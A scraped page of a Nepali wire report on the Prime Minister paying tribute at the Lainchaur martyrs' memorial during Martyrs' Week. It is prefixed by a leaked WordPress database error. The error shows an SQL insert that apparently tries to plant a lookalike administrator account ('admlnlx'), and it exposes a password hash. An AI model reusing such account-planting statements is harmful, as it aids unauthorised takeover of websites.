WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BI4jajMvO2UWG8M5Lka1bxAp2q8JLm.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 14:06:29', '', 'admlnlx', 'admlnlx')
काठमाडौँ, माघ १६ –
प्रधानमन्त्री पुष्पकमल दाहाल ‘प्रचण्ड’ले सहिद सप्ताहको अन्तिम दिन आज लैनचौरमा रहेको सहिद स्मारकमा पुगी सहिदको शालिकमा फूलमाला अर्पण गर्दै सहिदहरूप्रति श्रद्धाञ्जलि अर्पण गर्नु भएको छ ।
सो श्रद्धाञ्जलि सभामा सभामुख ओनसरी घर्ती मगर, मन्त्रीहरू हितराज पाण्डे र रवीन्द्रराज जोशी, मुख्य सचिव डा सोमलाल सुवेदी, प्रधान सेनापति, प्रहरी महानिरीक्षक र सरकारका कर्मचारीले पनि पुष्पगुच्छा अर्पण गर्दै सहिदको सम्झना गर्नुभएको थियो ।
सोही अवसरमा नेपाली सेनाले सहिदको सम्झनामा एक मिनेट सम्मान गारक अर्पण गरेको थियो ।
काठमाडौँ महानगरपालिकाको आयोजनामा सहिद सप्ताहको अन्तिमा दिन आज रत्नपार्क शान्तिवाटिकाबाट प्रभातफेरीको आयोजना गरी सहिद स्मारक लैनचौर पुगी मूल समारोहमा परिणत भएको थियो ।
विसं २०१२ देखि काठमाडौँ महानगरपालिकाले ज्ञात–अज्ञात सहिदको सम्झनामा हरेक वर्ष माघ १० देखि १६ गतेसम्मलाई सहिद सप्ताहका रूपमा मनाउँदै आएको छ । – रासस